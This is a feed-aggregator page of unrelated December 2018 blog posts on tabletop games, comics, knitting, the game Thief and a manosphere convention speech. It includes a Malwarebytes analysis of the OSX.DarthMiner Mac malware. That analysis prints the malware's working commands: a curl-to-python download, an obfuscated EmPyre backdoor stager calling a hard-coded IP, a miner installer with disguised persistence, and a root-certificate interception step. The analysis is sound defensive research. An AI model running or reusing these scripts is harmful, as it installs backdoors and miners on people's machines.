Feed aggregator

(5e) The Priest, The Witch, and the Lost Temple

Ten Foot Pole - Sat, 12/08/2018 - 12:18


By David McDonough
Self Published
5e
Levels 2-3

The town of Whitehaven is beset with undead. The townsfolk are quick to blame the so-called Witch of Whitehaven, who lives nearby with her partner in the Surbrin Hills. Yet a more insidious evil lurks in the midst of town, cloaked in a holy man’s robes. And far underground, an ancient evil artifact stirs. The town is in need of heroes. Will you answer the call?

This forty page adventure details a baddy in a town becoming one with evil, blah blah blah, and some blame shifting to the local witch. It’s trying. It’s got some decent ideas and tries to implement good design. The major, major sin in this is the complete inability to understand the purpose of what an adventure is … exemplified through levels of useless verbosity in descriptions and backstory that match Dungeon magazine. What decent ideas there are is not worth the effort to dig them out.

David, I’m going to address you directly. I don’t know if you’re ever going to see this. I don’t really care if you do or don’t. This blog is entirely for my own benefit, but I’m a hypocrite, and in my arrogance I’m going to just assume you’re going to see this. You don’t deserve what I’m going to say, no one does, really. But I note that you’ve also been told, repeatedly, that this is an awesome adventure and been given five stars over and over again. Those people have done you a disservice. The culture in online D&D circles is to love everything and give everything five stars. I’m going to appeal to the academic in you to recognize the truth in what I’m saying. (Although, I see you mention “policy” as well, which leaves me disheartened on your background …) You have some ok principals that you follow in design, but you have no idea how to actually write an adventure. Work on that. But you tried, and the good things you did have me making a stronger effort than usual to explain what you did wrong, for the two thousandth time.

Let’s first cover a few of the better things David does that, frankly, surprised me.

There’s an evil artifact in this adventure, the Orb of Undeath, used by the baddie. Generally the Black Falcon Idol of Doom is only usable by the bad guy, melt when he dies, kills the user instantly, turns you to evil immediately, etc. In other words, the designer shoves in a mechanical bonus for the baddie and then doesn’t allow the party to have the item. That’s crap design. In this case though the item is left for the party. There’s some DC20 8d6 damage nonsense throw in, but it’s not outright banned from usage. That’s good. The party SHOULD get unique magic items, artifacts SHOULD be given to them, and when you toss in “its evil” or something else like it then you also give a little nod to the roleplaying aspects of the game. It’s MORE than just a mechanical bonus/effect at that point. The game is magic. The game is mystery. The game is wonderous. Mechanical shit is none of that. The appendix description is a little heavy on backstory and mechanics needing more in the way of evocativeness than the mechanics. It also does no favors by making the intelligent item cold, unfeeling, and bereft of humor. Since it communicates it could use a personality that is more than a lack of personality. Again, it’s a wondrous item and should come across as such.

There’s also a tendency to give advice on how things can go wrong. If the party doesn’t find the lever then you can do this other to make the adventure go forward. This happens in several places. First, it’s nice for a designer to note how things can and do go wrong when the irresistible force of the party slams in to an adventure and offer assistance to keeping things moving along. It’s gets to my core conceit: the adventure should be a tool to helping a DM run it at the table. So, Good Job! But, I have to ask, why put those roadblocks in at all? Or, rather, perhaps we can divide it in to two piles. Things can and do change when the party hits the adventure and advice on that is good. But in other places DC checks are placed as obstacles to continuing the adventure. I call this Roll To Continue Playing D&D. If the adventure depends on the party making a DC5 skill check then why is in there to begin with? In the first encounter we roll to find blood tracks, etc to track down some farmers. If this fails then you hear the farmers cry out for help. Woah! Why the fuck am I rolling the dice in the first place then? Or, putting the secret room behind a hidden level … and putting an imp in the adventure that leads the party to it if they fail to find it.

There’s also a good scene or two. At one point you catch two witches in the process of interrogating a demon in a circle. Fun! There’s some hackney shit should “forgiving” if you attack one of them, but, still, the setup is good. There’s also a nice bit where the townfolk rebel against the evil in their midst while the party is out fucking around in the woods with the witches. I can’t say enough how refreshing it is to see that. There’s some buildings on fire, some blood, people hold up in homes, attacking zombies, all its missing are a couple of bodies swinging from lampposts. It’s nice to see villagers not fuckwits for once AND that the game world has shit going on in it outside of the parties actions (or, maybe, as a result of the parties actions.) I note, also, that this gets to Rients assertion that gameworlds should be shaken up. It’s written like crap, but the core sentiment of this little section is a good one. There’s also a nice little bit of advice on what happens is a bad guy escapes, the consequences of that.

Now, on to the shitshow …

What is the purpose of an adventure? It is to help the DM run it at the table. That’s it. AT. THE. TABLE. All those people commenting on the rich backstory, etc, are fuckwits. Why? Because that does not contribute to running it at the table. In fact, it makes it HARDER to run at the table. When the party goes through a door in to a new room that DM gets to glance down at the adventure for a fraction of a second, grok the nature of it, and then communicate it to the party. Everything the adventure does needs to contribute to that. While the party is reacting the DM has a little more time to glance down and take in some more information. If you have to stop and read a page, or a column or information then the adventure has failed. [Aside: you can also write “sticky.” This is fucking hard. Google: Old Bay, the elderly hill giant who retired to eat giant crabs.] You have been infected by people changing what the concept of normal is. First, this the professionals, who write based on pay per word. All they care about is taking one idea and strapping enough words on to it to get paid. Second, there are failed novelists who write adventures with rich backstory, with no intent of running at the table, and companies who cynically pander to this market knowing that most adventures will never get run so why not cater to the larger market of people who only read adventure … and to whom this endless backstory/motivation shit appeals to. Finally, people have grown up on this shit and think that’s how you write an adventure. They know no better, It’s the normal way. IT’S FUCKING NOT. Fucking publishers.

Motivations, backstory, justifications, if you have to have them then stick the shit in an appendix. Then the fuckwits get their nonsense and you get to the keep the core of the adventure focused on its purpose: helping the dm run it at the table. When you bury important details in columns-long text you are not helping the DM run the adventure. On page seven important towny flavor stuff (wary/excited about strangers) is buried in otherwise garbage shit that is irrelevant. (Meaning, someone will justify it as tangentially relevant.) NPC’s with a column long description on how to roleplay them? No thanks. You get a sentence each, at most, for description and personality, and then you bullet point or use whitespace to effect to make it trivial for the DM to locate what they relate. Backstory and motivations in the main text? NO. Only what you need to run the adventure RIGHT THEN goes in the main text. What is relevant, IMMEDIATELY AND DIRECTLY RELEVANT to the parties interaction? [Aside: Pedants like to take this to the logical extreme and say that’s my position. A special note to them: Fuck Off.]

Note location W3, The Tower, a location in town. The Name is “the Tower.” Then there’s a bunch of read-aloud. THEN you get a paragraph of DM’s notes telling you what the purpose is. How the fuck does that help me locate the mayors office when I’m running this thing? Seriously? Reading ALL of that? If I hand this to someone blind and say “tell me where the mayors office is in the first section” then thats a much more realistic simulation of running it at the table.

And, speaking of read-aloud … yes, there’s too much. You get three sentences. Maybe two. That’s it. There’s a study. WOTC wrote about it. People don’t pay attention after that (at the table, that is.) Bullet points. Improvise. Creative a terse and evocative description for the DM. The DM is the MOST powerful tool a designer has. Terse writing/organization contributes to running it at the table. EVOCATIVE writing leverages the DM’s brain to fill in the void left by the terseness and is MORE effective at creating atmosphere than ANY length of verbose writing. If you can jab a FLAVOR in to the DM’s brain then they can extrapolate indefinitely. Ug, and the FEELS. You don’t get to write read-aloud telling the party what they do/feel. “As you walk cautiously …” no. They didn’t walk cautiously. They ran willy nilly. But your fucking read-aloud doesn’t jive with that. Do you get it? “As torches spark to life.” No. We all have darkvision. We used continual light spells. We burned the place down.

And, of course, we have to suffer through mundane room descriptions. “There’s a side table in the dining room.” Well, whoop de doo! That’s certainly added a lot to the adventure! Seriously, what’s the point of this? To tell us what a dining room looks like? It’s fucking dining room, we know what a dining room looks like. Concentrate on the aspects of the room that are important.

Oh, what else? A thousand things. The hooks are all mission assignments. Those are boring. That’s an appeal to “do you want to play tonight or not?” D&D. It’s the most throwaway form of a hook. You practically have to beat two farmers to get the first part of the adventure. They are sent for help and yet you need to beg and plead and to be allowed to help them. I fucking HATE adventures that make you fight for the hook. Obviously, the bad guy is actually good and the good guy actually bad. Duh. This is so obvious I almost didn’t mention it. The first whiff of this is in an inn and its immediately obvious, so much so that I’d just stab the baddie in the throat right there … which to its credit the adventure addresses later on in some advice. But, still, wouldn’t it be refreshing if the wise woman was actually the bad guy?

Oh, the LG honorable ghost knight doesn’t have the heart to protect the party from the evil shadows attacking them since they were his followers once. Geee, LG much? The undead attack stuff is not handled well, there’s not much build up to it, no tension. A will O the Wisp is just presented as another thing to hack down, ignoring thousands of years of it luring people to their doom. (My favorite one imitated the scent of gold … in a game where dwarves could smell gold.) Important facts, such as things in the village like rescusing people, should have been presented in an overview section, etc, to introduce how the village was meant to work, etc. Same for the wilderness section, which just has section headings.

You can write adventures to make money. You can write adventures that are actually this kind of novel-thing that most fall in to. Or you can write adventures meant to be run ta the table. If you’re gonna do that then THINK. Question the core assumptions that have led you to think that more is better.

This is $3 at DriveThru. The previs is twelve pages! Nice! Pages five and six show you begging farmers to be allowed to play D&D tonight. Page seven shows you a VERY long inn entry that fails at transferring information to the DM efficiently and effectively … as well as Ye Olde Mayor’s Tower … that you have no way of knowing without digging in. The last page of the preview shows you some of the developments/advice for the unexpected. Overall, a good preview, with the writing typical of what you should expect to see in the rest of the adventure …
https://www.drivethrurpg.com/product/257361/The-Priest-the-Witch-and-the-Lost-Temple-An-Adventure

Categories: Tabletop Gaming Blogs

OH, THE CALAMITY!

First Comics News - Sat, 12/08/2018 - 08:45

New Series from Magdalene Visaggio, Corin Howell, Valentina Pinto, and Zakk Saam Set for a February 2019 release


MILWAUKIE, Ore., (December 7, 2018)—From Eisner and GLAAD Media Award-nominated writer Magdalene Visaggio, breakout artist Corin Howell, colorist Valentina Pinto, and letterer Zakk Saam comes Calamity Kate! Calamity Kate is a modern day adventure of heroes and monsters. Visaggio (Eternity Girl, Kim & Kim), Howell (Ghostbusters: Answer the Call, The Girl in the Bay), Pinto (Dejah Thoris), and Saam (Kim & Kim) join forces to tell the story of Kate Strand as she moves west to hunt monsters.

Calamity Kate catches up with titular hero Kate Strand after she reboots her destructive life and moves to L.A. to become the superhero she always wanted to be—a gun-toting monster killer. With her latest career change, she faces new challenges, relationships, and competition. Kate is desperate to show she’s worth a damn in a world overrun by zombies, vampires, demons, goblins, and the ultimate monster bounty: The Seven Fabled Beasts of Yore.

The first issue of Calamity Kate (of four) goes on sale February 13, 2019, and is available for pre-order at your local comic shop.

Categories: Comic Book Blogs

Universes Collide! Conan Enters The Marvel Universe in AVENGERS: NO ROAD HOME!

First Comics News - Sat, 12/08/2018 - 08:26

New York, NY—December 7, 2018—The all-new weekly Avengers event continues in March with an epic story from Al Ewing, Mark Waid, and Jim Zub, with art by Sean Izaakse and Paco Medina – and the famed barbarian himself is slashing his way into the Marvel Universe in AVENGERS: NO ROAD HOME!

 

It all starts when The Scarlet Witch enters the Hyborian Age, and continues when the Avengers take their fight to the Queen of the Night! And while Conan and the Avengers will fight together, the question remains…whose side is Conan really on?

 

It’s an action-filled, jam-packed story that you won’t want to miss, and it all starts in AVENGERS: NO ROAD HOME #6 – when the Marvel Universe will be forever changed, by Crom!

 

 

AVENGERS: NO ROAD HOME #6

Written by AL EWING, MARK WAID, JIM ZUB

Art by SEAN IZAAKSE

Cover by YASMINE PUTRI

On Sale 3/20/19

 

Categories: Comic Book Blogs

blogmas 2018 :: bright new knits

Autumn Geisha - Sat, 12/08/2018 - 02:44


A couple of cozy projects to brighten these short days of winter. The yarn is from Must Stash Yarn in the Bumbles Bounce colorway. The pattern for the blanket is Northeasterly and it is so fun & easy. I can’t wait to start on the second column and see it grow. The kid and I are having a Friday night holiday movie marathon (hubby is on a work trip to Texas). Just watched Rudolph and Charlie Brown. Next up is my pick: Little Women. The kid will probably doze off after fifteen minutes whereby I can switch to Love Actually :) Have a wonderful weekend!
Categories: Knitting Feeds

Six Gun Sound - 1st Night in Devil's Elbow - Part Two

Two Hour Wargames - Fri, 12/07/2018 - 20:31
Part One
After a good night of carousing in Devil's Elbow, Billy leaves the Golden Lady saloon and is confronted by two figures in the street.
Gambling in THW is a good way to gain increasing Rep d6, which can help you to improve your Rep. But when you leave the gambling place, especially after winning, there's a chance you could run into problems. 1st up - There's a chance that you can get robbed. Winning at gambling increases the chance of it happening.

2nd problem - Hard Feelings If you win at gambling, the NPCs that lost could decide to have Hard Feelings and will meet you outside to get their money back. This time - it was a case of Hard Feelings.


You can play Six Gun Sound - Devil's Elbow with minis or paper counters. In fact, we've included two color card stock Battle Boards and great color counters AND some awesome A-Frame cowboy counters. Brett at Precis Intermedia has provided these minis and if you haven't seen all their products, rules, terrain tiles and great paper minis, check them out.

The Confrontation can escalate from a good old fashion fist fight to a draw. The NPCs have to roll to see if they escalate, but as a Star , I decide it's time to "throw down".


Stars can do what they want but NPCs have to take the Will They Draw Test to see if they will stick around. And looks like the Townsfolk wants nothing to do with. Billy and the NPC roll 3d6 versus Rep and Billy passes 2d6 with a passing d6 total of 5 (3 and 2). The NPC passed 3d6, but scored a total of 4 (2, 1, 1). Billy goes first and rolls once on the Draw Damage Table, scoring a 2. 6 is Obviously Dead, Rep or higher but not a 6 is Out of the Fight, lower than Rep - reduce target Rep by highest passing d6 of the shooter so the NPC drops from 4 to 1. He takes the Continue On Test, passes 1d6 and goes Out of the Fight.



Categories: Tabletop Gaming Blogs

[BEYONDE] Thief: The Dark Anniversary

Beyond Fomalhaut - Fri, 12/07/2018 - 20:03
Rose Garden
It has been twenty years (and one week) since the publication of Looking Glass Studios’ unconventional masterpiece: Thief: The Dark Project was released 30 November, 1998. Thief would invert the formula of first-person shooter games: instead of shooting enemies, you would have to hide from them (or carefully sneak up on them and knock them out with a blackjack); instead of playing a badass space marine, the main character was a thief who could hardly fight a single guard; and instead of a rocket launcher, your ammo would consist of water arrows to extinguish torches, and moss arrows to coat loud surfaces with a sound-dampening moss. Thief had replaced non-stop action with carefuly scrutiny of the environment and the patrols around you, and quick, panicked bursts of action while trying to move from one safe, shadowed spot to another. Getting through a loud, tile-covered corridor segment before the patrol would return; nabbing a priceless gemstone from behind the back of a guard looking the other way; or breaking the lock on a well-illuminated door before bolting back into the shadows – these are the building blocks of the Thief experience. Thief had originally been planned as a swordfighting game (Dark Camelot was never realised, but the fencing system is still fairly robust), but something went fatefully wrong during development, when one of the lead designer tried to infiltrate a room while hiding behind an enemy. This kind of tension can prove addictive.
Shadow PlayThief’s main attraction lies not just in its conceptual originality, but also its precise and narrow focus. Deus Ex (2000), often held up as the best game ever, is a mediocre shooter, a mediocre sneaking game and a mediocre CRPG, with some decent but hardly outstanding environmental simulation – but the individually flawed bits make for something much more than the sum of its parts. Thief does two things (sneaking and exploration), but does it impeccably. Its graphics were already dated on the date of its publication (contemporary reviews were surprisingly critical about it, even though its “look” is iconic, and uses colours and shapes in a very clever way). However, its audio– consisting of noises, odd echoes and monotonous tension loops – is one of a kind, and has rarely been approached in its atmosphere. The guards’ drunken rambling and lowbrow conversations are not just a matter of establishing a certain feel, but cues to help you locate and avoid them: they will signal whether they are preoccupied with their crappy night job (“I don't see why I should have to be the one down here in the cold and the dark and the damp....”), looking for you (“Is it just me or did something move?”), preparing to rush and kill The Sound of a Burrick in a Roomyou (“All right, you're in for it now, thief!”), or summoning help (“Intruder! Help, help!”). The stealth system, based on shadow-light patterns and the loudness of footsteps on various surfaces (wood, earth, carpet, metal, stone, tile, etc.) requires a minimal user interface in the shape of a small “light gem”, while being fully immersive and providing excellent visual and aural feedback. Learning to move silently is a talent you have to learn, and then master to get ahead. Thief is, in many ways, a fully player skill kind of game.


Whistling of the GearsThen there is the world: a clash of the middle ages and an industrial revolution, surrounded by the soot-covered walls of a claustrophobic, nameless city that has grown well beyond its natural limits. A place filled with inscrutable, ticking machinery; pipes and grates belching steam and smoke; arc lights and generators – and on the other side of the coin, guards in mail, snooty lords and dark magic. Progress in this world is represented by the Hammerites, a fanatical religious order maintaining much of the City’s technological infrastructure, slowly losing out to more commercially-minded lay smiths, while trying to root out the pagan heretics who would return the world to an irrational (and entirely wretched) bucolic past. Most of the citizens, however, are corrupt or simply uncaring guards, cruel crime bosses, indolent aristocrats and their snivelling servants. While In and OutThief may seem steampunk, it is in truth outside the confines of genre: like its distant successor, Dishonored, it is an original creation that has more to do with film noir (particularly The Third Man – when you steal from The Third Man, you are stealing from the best) and Dungeons & Dragons. The story is a highlight: the protagonist, the cynical and embittered thief Garrett, is an anti-hero in the truest sense: he is egoistic, arrogant, petty, and his own worst enemy – under the mask of professionalism, he is motivated by enormous vanity, and resentment against his former benefactors. By the time the story ends, he loses all he has gained, but learns nothing.
Darkness Walk With UsThief has never been continued in a truly worthy way. The story reaches its due conclusion at the end of the first game. The sequel, while often more refined, loses much from the energy and the aesthetic; the third and fourth games are increasingly fruitless efforts to sell the original formula to a mass-market audience. The results are at first questionable, then catastrophic: the 2014 reboot is a complete failure both as a Thief game and a corporate moneymaker. Underworld Ascendant, the new game by Looking Glass alumni, is a creative and financial black hole. The true successors are found in the Dishonored series (which remakes the original idea as an assassination game where you don’t actually have to kill anyone), and in the free, fan-made Dark Mod. However, the richest content lies among the community-made fan missions, still going strong after 20 years.
Lost Among the ForsakenThe Thief community has always been tight-knit and motivated, verging on the fanatical. It was their incessant lobbying at Looking Glass which had earned us the release of the editor, followed by a stream of fan missions from small, simple affairs to sprawling, campaign-length epics (some still under development). It would be too much to play all 1200 of them, and of course, they have an enormous range in style and quality. However, the best, including Gems of Provenance, The Seven Sisters, Endless Rain, the Rocksbourg Seriesor Calendra’s Cistern/Legacy, are worthy successors to the original game.
The Burning BedlamWith a build time of a whole year, the recently completed 20th anniversary contest has seen the release of no less than 24 missions (and one out of competition). They are wildly different takes, from beginner efforts (proving that Dromed, the game’s quirky editor, is still inviting) to a surprising number of missions which should become modern classics (see this article’s illustrations). One of the missions, Rose Garden, is mine – I returned to Thief after a 10 year hiatus, and spent much of this year on constructing a giant, complex city map. Of course, you should play the basic game first if you haven’t. Make sure you do so without any texture or model “upgrades” (and if you have particularly good taste, stay with software rendering), and enjoy Thief the way it was meant to be played. It has aged well, and it is just as intriguing and mysterious as in its year of publication.
(A post on Thief's lessons for tabletop gaming will follow shortly.)
Rose GardenRose Garden
Categories: Tabletop Gaming Blogs

Mac malware combines EmPyre backdoor and XMRig miner

Malwarebytes - Fri, 12/07/2018 - 16:57

Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.

Behavior

Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

This script is designed to download and execute a Python script, then download and run an app named sample.app.

The sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script? That turned out to be obfuscated, but was easily deobfuscated, revealing the following script:

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep" ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) out = ps.stdout.read() ps.stdout.close() if re.search("Little Snitch", out): sys.exit() import urllib2; UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t); req.add_header('User-Agent',UA); req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk="); proxy = urllib2.ProxyHandler(); o = urllib2.build_opener(proxy); urllib2.install_opener(o); a=urllib2.urlopen(req).read(); IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[] for i in range(256): j=(j+S[i]+ord(key[i%len(key)]))%256 S[i],S[j]=S[j],S[i] i=j=0 for char in data: i=(i+1)%256 j=(j+S[i])%256 S[i],S[j]=S[j],S[i] out.append(chr(ord(char)^S[(S[i]+S[j])%256])) exec(''.join(out))

The first thing this script does is look for the presence of Little Snitch, a commonly-used outgoing firewall that would be capable of bringing the backdoor’s network connection to the attention of the user. If Little Snitch is present, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would have already blocked the connection that would have attempted to download this script, so checking at this point is worthless.)

This script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the infected Mac. Once the backdoor is open, it receives a command that downloads the following script to /private/tmp/uploadminer.sh and executes it:

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges" cd ~/Library/LaunchAgents curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist launchctl load -w com.apple.rig.plist launchctl load -w com.proxy.initialize.plist cd /Users/Shared curl -o config.json http://46.226.108.171/config.json curl -o xmrig http://46.226.108.171/xmrig chmod +x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json &

This script downloads and installs the other components of the malware. A launch agent named com.proxy.initialize.plist was created to keep the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a launch agent named com.apple.rig.plist to keep the XMRig process running with that configuration active. (The “com.apple” name is an immediate red flag that was the root cause of the discovery of this malware.)

Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.

On the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to slow down, thanks to a process that sucks up all the CPU/GPU.

However, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a command issued by the backdoor, and there may very well have been other arbitrary commands sent to infected Macs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to infected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other things.

Implications

Malwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what else the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or captured passwords.

There’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can undertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this behavior. Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free.

IOCs Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

The post Mac malware combines EmPyre backdoor and XMRig miner appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cosmos Cardigan

Moogly - Fri, 12/07/2018 - 15:41

The Cosmos Cardigan is an oversized and subtly sparkly sweater that’s so out of this world cozy, you’ll want to throw it on every day this season! Make your own with this free crochet sweater pattern on Moogly – both Misses and Plus sizes included! Disclaimer: This post includes affiliate links; materials for this pattern [...]

The post Cosmos Cardigan appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

9
Categories: Crochet Life

State of the Manosphere 2018

The Rational Man - Fri, 12/07/2018 - 03:51

On October 12th, 2018 I delivered what a lot of men told me was the best speech I’ve ever given. I worked really hard on collecting my thoughts and observations of the manosphere, but I’m afraid I’m really not much of a speechwriter. My initial intent was to write a full analysis of the state of the manosphere – as requested by Anthony Johnson and a few others – and then give an impassioned reading of it.

I couldn’t do it. It seemed kind of stale to me to just read what was really a much better essay than a speech. The night before my time to speak I decided to distill the ‘essay’ down to my key points and use them as a roadmap for what I wanted to convey. I’m actually very good at digital media. I’ve been a designer and art director for most of my professional life. I could very easily have whipped up a presentation in PowerPoint or Keynote, but for this I want to connect with the audience face to face and distraction free. So I went old school and fell back on my trusty flash cards and notebooks, and then went up to speak from the heart rather than read from my head.

But damn it, I worked hard on my speech/essay. Anyone at the 21 Convention who saw me in the mornings prior to my speech probably saw me, nose in laptop, at the breakfast buffet working on the guts of it. Since it never made it to the podium in whole I thought I would polish it up a little bit for you here and let you in on what my thinking behind the speech was like. This is not the speech I gave at the convention, but it is the thought process behind it.

One key element of my talk was the SWOT analysis I did of the future of the manosphere going forward. This is the only part I’m omitting from this essay because I’d rather it not get confused with the actual talk. And that talk, by the way, will be forthcoming either this month or January of 2019 courtesy of the 21 Convention. I will make a blog announcement when the video becomes available. For now, this is the work behind that talk.

Good morning gentlemen.

There’s a lot I want to cover today, but before I do I wanted to let a few people know how honored I am to once again be here to relate with you all.

First and foremost, I want to thank my friend and co-host of the Red Man Group, Anthony Johnson. With out Anthony there is no 21 Convention, but most importantly I want to thank him for believing in what I alway hoped this convention could be. The 21 Convention has become what I believed would be necessary a while ago. There was a point right after I began to see how my first book, The Rational Male, was being received that I knew how needed an event like this would be.

If you read me on Twitter or you’re a fan of my blog you’ll know I’ve developed a reputation for predicting the future. I joke around about it, but one of my quotes is “I hate being right all the time”. I’ll tell you now, I don’t actually have super powers to predict the future. However, I like to think I’m fairly adept at seeing trends and recognizing patterns. I knew there would need to be some sort of Red Pill Summit. The manosphere was expanding then, as it continues to today and something would need to develop if the message was to expand with it.

As most of you know, I’m not a fan of seminars; particularly now. The motivational speaking and the self-help industry has exploded with the rise of the internet – and with that the number of gurus intent on cashing in on the insecurities of others (mostly young men, the ‘Lost Boys’ generation) has exploded too. I knew then that I didn’t want to have anything to do with 21st century snake oil reheated to be relevant in today’s age. So whatever this Red Pill Summit would be, I knew I wanted to avoid the selling of good-vibes. It needed to be real, and that meant taking chances.

When I met Anthony I was skeptical. 

That’s a nice way of saying I thought his old format was essentially nine years of Purple Pill seminars which were exactly the kind of thing I wanted to avoid in a Red Pill summit. So I turned him down that first time. To his credit, Anthony wasn’t put off by that. He had every reason to be, but he’d had his life changed by my own work, was becoming Red Pill Aware and he was determined to take the chance on radically shifting the direction of the ‘old’ 21 Convention toward something that had more substance than just being an advertisement for some over-priced non-credentialed ‘coaching. So we looked to find the right men to create this summit.

This year, and with this roster of men, that idea for a Red Pill summit is finally coming to fruition. So, I want to also thank all of you, the people who believe in this venture, the people who work hard to make it possible and the men who make this convention a priority to attend. 

All of this might seem like a long winded way of telling the story of this new convention, but I snuck in a lot of the key points I’ll be addressing today. It’s an important story to tell because not enough men really understand what it is they’re a part of today. I’ve been part of what we call the manosphere since its inception. Now that’s not me trying to establish red pill street credit; it’s to say that I was a part of what’s now known as the manosphere from the beginning. But it’s important to look back on where we came from to understand where we’re going.

I’ve been called The Godfather of the Red Pill. I’ve been called one of the three ‘R’s of the manosphere – Roosh, Roissy and Rollo – and while this is still an honor for me, it’s also a reminder of who I am, what I’ve become and how this community has shaped me and the millions of men who’ve “unplugged” from the Matrix of a feminine-primary social order. 

I don’t relish the role of being the manopshere’s chronicler, but I understand why it’s necessary, so I accept it. I would much rather be connecting dots and developing ideas to consider about what we call intersexual dynamics and the true Red Pill. But that term, “The Red Pill”, has become bastardized to serve as an ad-hoc brand for many pet ideologies and personal beliefs recently. I don’t care to talk about the manosphere – I would rather be doing the real work – but I’m one of the few men who have the history to do so accurately.

As the manosphere expands and more men are drawn to this tribe the need to accurately know where we’ve come from is more important. Even I fall into the trap of assuming that men just come equipped with a foreknowledge of Red Pill history and a grasp of the fundamentals of Red Pill awareness. When Anthony and I, and later Rich Cooper, started the Red Man Group podcast I quickly became aware of the need to go back over the basic Red Pill 101 for men who have become a part of the tribe. 

I also became aware that if I didn’t step up to tell the real story of the Red Pill that it would be told for us by others who see this community as a convenient niche to exploit and to twist to their messages.

So, here I am. 

What is the Manosphere?

For as much as the mainstream would like to demonize it, the manosphere is really a collection of the minds of men. The manosphere is a Gestalt. That’s going to be an important word going forward here. A Gestalt is an organized whole that is perceived as more than the sum of its parts. And there are many parts of the manosphere.

For some, the manosphere is a convenient collection of like-minded men who share a common ideology. This is where the mainstream gets the idea that the manosphere is a gathering of misogynists. To our ideological opponents any collection of men, no matter the intent, is always suspect of misogyny. We’ll get back to misogyny later, but even a gathering of 200 of us here, no matter our purpose, is enough to make a feminine-primary social order very nervous. 

To them, men gathered together has dangerous implications. 

Keep this point in mind; it is a means of control over the Gestalt Masculine.

The primary strength of the ‘sphere is that we are a consortium of men’s experiences. We are gestalt; an aggregate of men who’ve come together to share, debate, to improve, to fight and to agree or disagree on the realistic state of men everywhere –  all based on observations, empirical evidence and commonality among all men’s collected experiences.

Usually a man’s first experience with the manosphere is through his becoming Red Pill aware. I mean this in the sense of intersexual dynamics. I know the “Red Pill” has been bastardized to mean whatever ideological or political bent a person may have, but this isn’t where the term originated. Men generally find the ‘sphere because they want to improve their understanding of women. 

Some become so distraught that they’re on the brink of suicide.

It may be from a life long confusion about the decisions they’ve made with women; a girlfriend, a wife, an Ex. What they find in the manosphere is answers. Maybe they find the works of any number of the men speaking here today. Maybe they find MGTOW, or the Men’s Rights Movement. 

Maybe they find the Red Pill forum on Reddit (or maybe not today since the forum is still quarantined). 

Maybe they discover more of the same in Purple Pill hacks – life coaches – who are feeding them just enough Red Pill awareness to them so that it seems novel. 

Or maybe they find my blog and books.

Regardless, each of them is looking for a means to improve their lives. We don’t advertise in the manosphere. Not much anyway. The Red Pill, by its nature, is something that a man has to be looking for. Anyone who’s ever tried to “red pill” his friend or brother to help them avoid a life-ruining decision knows what I mean. It’s an unfortunate truth that men are often Zeroed Out and at their lowest when they become most open to introspection.

Men are often looking to understand women, but this eventually becomes an education in understanding themselves. It’s never enough to simply learn some PUA techniques. Game is integral to a Red Pill awakening in a man, but it is an incomplete act without internalizing the truths that the practice of Game reveals to men. As men learn about the nature of women they also come to realize why they did what they did, and why men do what they do. I often have men tell me how they wished they had the knowledge of the Red Pill before they made some debilitating decisions in their lives. 

And this is what I’m talking about.

Eventually the man who just wanted to learn enough Game to get his ‘dream girl’ interested in him, that guy comes to see that solving the problem of himself is the key to that challenge and so many more. 

It leads to him seeking mastery of himself.

Men unplug from their life-long Blue Pill conditioning, but in doing so they come to question more than just their conditioning. They question what they’ve been taught to think of themselves. That self-revelation is often a very rough experience for men who’ve invested so much of themselves in a paradigm set against them.

